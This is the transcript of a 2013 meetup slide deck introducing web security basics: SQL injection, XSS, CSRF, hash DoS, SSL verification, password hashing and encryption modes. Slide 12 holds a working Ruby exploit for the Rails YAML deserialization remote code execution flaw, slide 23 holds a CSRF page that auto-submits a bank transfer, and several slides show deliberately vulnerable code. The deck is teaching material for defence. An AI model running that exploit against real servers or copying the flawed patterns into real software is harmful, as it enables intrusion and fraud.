Security for dummies

Security for dummies

Presentation given at the Enschede Web Developers meetup

B012094b37ab6946c44eaa41d7828478?s=128

Dirkjan Bussink

June 25, 2013
Tweet

Transcript

  1. Dirkjan Bussink d.bussink@gmail.com twitter.com/dbussink github.com/dbussink

  2. Security 101 The very very basics

  3. Not part of today

  4. Social Engineering Because there is no patch for human stupidity

  5. statement = "SELECT * FROM users WHERE name = '"

    + username + "'" SQL Injection
  6. None
  7. statement = ["SELECT * FROM users WHERE name = ?",

    username] SQL Injection Parameter binding
  8. Cross site scripting <div><%= person.name %></div> Inject Javascript!

  9. Mass assignment <html> <body> <form method="post" action="new_person"> <input type="text" name="name"

    value="" id="" /> <input type="hidden" name="parent_id" value="123" id="" /> <input type="submit" value="" id="" /> </form> </body> </html> What if I add this?
  10. Frameworks Solve it easily for you

  11. Remote code execution Let the server run my ruby rce.rb

    "Process.exit!"
  12. require 'net/http' require 'net/https' require 'uri' require 'yaml' code =

    ARVG[0] url = "http://localhost:3000" escaped_code = "foo; #{code}\n__END__\n" yaml = %{ --- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection ? #{escaped_code.to_yaml.sub('--- ','').chomp} : !ruby/object:OpenStruct table: :defaults: :action: create :controller: foos :required_parts: [] :requirements: :action: create :controller: foos :segment_keys: - :format modifiable: true }.strip xml = %{ <?xml version="1.0" encoding="UTF-8"?> <exploit type="yaml">#{yaml}</exploit> }.strip uri = URI.parse(url) http = Net::HTTP.new(uri.host, uri.port) request = Net::HTTP::Post.new(uri.request_uri, "X-HTTP-Method-Override" => "GET") request.content_type = "text/xml" request.set_body_internal(xml) response = http.request(request)
  13. Direct object references http://myapp.com/people/1 Let’s change this to 2!

  14. Access control Scope your queries

  15. External input Trust nobody

  16. None
  17. Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; document.cookie => "session_id=lee2oochaekae4woh6A;" Steal cookie in combination

    with a XSS attack
  18. Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; HttpOnly document.cookie => "" HttpOnly Disallows reading

    by Javascript
  19. Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; HttpOnly; secure Secure Only send cookie over

    HTTPS
  20. Frameworks Use one that solves this

  21. CSRF Who submits your forms?

  22. None
  23. On my evil hack site Just loading my page transfers

    money <iframe name=hack></iframe> <script> document.write('<form target=hack name=go method=post action="http://mybank.com/transfer.php"> </form>') go.submit() </script>
  24. <html> <body> <form method="post" action="transfer.php"> <input type="text" name="csrf_token" value="om5bohY2" id=""

    /> <input type="text" name="amount" value="" id="" /> <input type="text" name="from_account" value="" id="" /> <input type="text" name="to_account" value="" id="" /> <input type="submit" value="" id="" /> </form> </body> </html> Add token to each form Token ensures other site can’t simply POST to your
  25. Hash DOS Crafting input to do DOS attack

  26. Bucket 0 1 2 3 4 5 Figure 1: Normal

    operation of a hash table. suggested the use of crypto puzzles [9] to force clients to perform more work before the server does its work. Provably requiring the client to con- sume CPU time may make sense for fundamen- tally expensive operations like RSA decryption, but it seems out of place when the expensive opera- tion (e.g., HTML table layout) is only expensive because a poor algorithm was used in the system. Another recent paper [16] is a toolkit that allows programmers to inject sensors and actuators into a program. When a resource abuse is detected an ap- propriate action is taken. Bucket 0 1 2 3 4 5 Figure 2: Worst-case hash table collisions. bles are so common that programming languages like Perl provide syntactic sugar to represent hash tables as “associative arrays,” making them easy for programmers to use. Programmers clearly prefer hash tables for their constant-time expected behav- ior, despite their worst-case O(n) per-operation run- ning time. After all, what are the odds that a hash table will degenerate to its worst case behavior? In typical usage, objects to be inserted into a hashtable are first reduced to a 32-bit hash value. Strings might be hashed using a checksum oper- Craft input for collision
  27. Hashes everywhere A lot of attack vectors

  28. SSL in your app Verify certificates

  29. curl_easy_setopt(download_handle, CURLOPT_SSL_VERIFYHOST, 2); 2 is the magic value...

  30. $fp = fsockopen ('ssl://www.paypal.com', 443, $errno, $errstr, 30); fsockopen() does

    not validate server certificate PHP
  31. The “advanced” SSLSocketFactory API silently skips hostname verification if the

    algorithm field in the SSL client is NULL or an empty string rather than HTTPS Java Why this as the default?
  32. require "net/http" require "net/https" require "uri" uri = URI.parse("https://secure.site/") http

    = Net::HTTP.new uri.host, uri.port http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_PEER request = Net::HTTP::Get.new(uri.request_uri) response = http.request(request) Ruby Does not validate certificate by default...
  33. Stupid API’s Know how to work with them

  34. Storing passwords Can I get the passwords stored in your

    database?
  35. None
  36. But I’m safe, I hash and salt! Digest::SHA1.hexdigest( "#{password}--#{salt}" )

  37. 1.93% were between 6 and 10 characters long 2.45% were

    comprised entirely of lowercase characters 3.36% were found in a common password dictionary 4.67% were reused by the same person on a totally unrelated service (Gawker) 5.Only 1% of them contained a non-alphanumeric character 77 million breached PlayStation Network accounts
  38. 260M checks / second GPU acceleration makes forcing viable these

    days
  39. Salted hashes are not good enough anymore

  40. Libraries Use them, don’t roll your ow

  41. bcrypt PBKDF2 scrypt

  42. Designed to be slow

  43. KDF 6 letters 8 letters 8 chars 10 chars 40-char

    text DES CRYPT < $1 < $1 < $1 < $1 < $1 MD5 < $1 < $1 < $1 $1.1k $1 MD5 CRYPT < $1 < $1 $130 $1.1M $1.4k PBKDF2 (100 ms) < $1 < $1 $18k $160M $200k bcrypt (95 ms) < $1 $4 $130k $1.2B $1.5M scrypt (64 ms) < $1 $150 $4.8M $43B $52M PBKDF2 (5.0 s) < $1 $29 $920k $8.3B $10M bcrypt (3.0 s) < $1 $130 $4.3M $39B $47M scrypt (3.8 s) $900 $610k $19B $175T $210B
  44. I have something else now! Migration is not very hard

  45. Add new authentication When user logs in, store password in

    new way After X time remove old passwords
  46. Signing Don’t design your own

  47. user_id=1--kee0oiviemaeXiW7aeb8eexuthohyua Signed cookies Hash computed with secret

  48. http://myapp.com/profile/1/wa5eexuf9wiex1do Email URL with direct login Hash for one time

    login
  49. Digest::SHA1.hexdigest( "user_id=#{id}-#{secret_token}" ) Hash with a secret Broken

  50. sha256 = OpenSSL::Digest::Digest.new('sha256') tag = OpenSSL::HMAC.hexdigest(sha256, secret_token, message) HMAC hash-based

    message authentication code
  51. Encryption Know what you are doing

  52. AES ECB Just don’t use it

  53. None
  54. AES CBC / CTR When using CBC mode, an Initialization

    Vector (IV) is provided along with the key when starting an encrypt or decrypt operation. If CBC mode is selected and no IV is provided, an IV of all zeroes will be used.
  55. Don’t trust input Also sign encrypted data

  56. cookie = "j2x+8Y5CqDRnYqRvMsHmi61YBzA7qvc4f7agmYxdHgvqz 7Jaekoxjp3MrgSvB3GU--kc/FbSvFIfIFzM0UzQhhvw==" Encrypted cookie aes-128-cbc

  57. "so long, and thanks for all the fish"

  58. Encrypt then MAC Verify that the data is authentic

  59. Authenticated encryption

  60. None
  61. https://www.owasp.org/index.php/Top_10_2010-Main https://www.owasp.org/index.php/SQL_Injection https://www.owasp.org/index.php/Top_10_2010-A4 https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003.pdf http://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf http://www.troyhunt.com/2011/06/brief-sony-password-analysis.html http://gpuscience.com/cs/cracking-salted-sha1-password-hashes-on-gpu/ http://www.bsdcan.org/2009/schedule/attachments/86_scrypt_slides.pdf

    http://en.wikipedia.org/wiki/Hash-based_message_authentication_code http://blog.jcoglan.com/2012/06/09/why-you-should-never-use-hash-functions-for-message-authentication/ http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#Electronic_codebook_.28ECB.29 http://en.wikipedia.org/wiki/Padding_oracle_attack http://tonyarcieri.com/all-the-crypto-code-youve-ever-written-is-probably-broken https://www.coursera.org/course/crypto Background